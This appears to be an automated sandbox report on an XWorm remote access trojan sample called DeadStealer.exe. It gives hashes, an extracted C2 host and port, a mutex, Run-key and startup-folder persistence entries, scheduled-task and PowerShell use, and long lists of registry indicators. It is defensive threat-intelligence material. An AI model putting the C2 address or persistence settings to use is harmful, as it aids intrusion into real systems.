xworm | a4beca9447f15277f11843a2109ce49e0f4c69055e2c17ed60d59e24cefea82a

Analysis

max time kernel
37s
max time network
83s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
19/09/2024, 03:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DeadStealer.exe
Size

4.3MB
MD5

c4a908dcbd6e7e233dd9b8262c94ac39
SHA1

bb2a46603908e118dbbb1c74fd377f4e5427e3fe
SHA256

a4beca9447f15277f11843a2109ce49e0f4c69055e2c17ed60d59e24cefea82a
SHA512

d71213e64a4f0a2071e8d5c782debb35ddd4788c7eb0c155497f40c7b5710417ce1d7a553758edeee95bf0ca68825386da2557bda4ead95191d4b7c8515bb1aa
SSDEEP

98304:RkjozJ9/im8XVBKl6tmJVP2sRx/E0T7zN3HtHOIT4bNJFY3Oqt2SGuA+i1i:tzJpjS346tmJ1ds+7ptHOjBHYm9uAm

Score

10^/10

xworm agilenet discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

subscribe-bond.gl.at.ply.gg:28600

Mutex

qjVRKNjch8MreOzA

Attributes

Install_directory
%Public%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000001ab31-91.dat	family_xworm
behavioral1/memory/2988-94-0x0000000000970000-0x000000000097E000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 812 created 600	812	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
812	powershell.EXE
2188	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadXClient.lnk	DeadXClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadXClient.lnk	DeadXClient.exe

Executes dropped EXE 4 IoCs

pid	Process
2028	svchost.exe
3192	DeadCodeRootKit.exe
2988	DeadXClient.exe
3364	DeadXClient.exe

Obfuscated with Agile.Net obfuscator 8 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/4476-2-0x00000219D8D50000-0x00000219D8D70000-memory.dmp	agile_net
behavioral1/memory/4476-3-0x00000219F1650000-0x00000219F1670000-memory.dmp	agile_net
behavioral1/memory/4476-5-0x00000219F1780000-0x00000219F17EE000-memory.dmp	agile_net
behavioral1/memory/4476-9-0x00000219F1680000-0x00000219F1690000-memory.dmp	agile_net
behavioral1/memory/4476-10-0x00000219F1690000-0x00000219F16AE000-memory.dmp	agile_net
behavioral1/memory/4476-8-0x00000219F1930000-0x00000219F198A000-memory.dmp	agile_net
behavioral1/memory/4476-7-0x00000219F1670000-0x00000219F167E000-memory.dmp	agile_net
behavioral1/memory/4476-11-0x00000219F2BC0000-0x00000219F2D0A000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\DeadXClient = "C:\\Users\\Public\\DeadXClient.exe"	DeadXClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
1	pastebin.com
2	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 812 set thread context of 3772	812	powershell.EXE	82

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeadCodeRootKit.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	DeadStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	DeadStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	DeadStealer.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\1 = 7c003100000000003359951d11005075626c69630000660009000400efbe724a6fa83359951d2e000000630500000000010000000000000000003c0000000000e74449005000750062006c0069006300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003600000016000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "5"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000cc58d909100041646d696e003c0009000400efbecb5881bdcc58d9092e000000835201000000010000000000000000000000000000000a48db00410064006d0069006e00000014000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "3"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\1\NodeSlot = "6"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2220	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3340	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe
4476	DeadStealer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3340	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
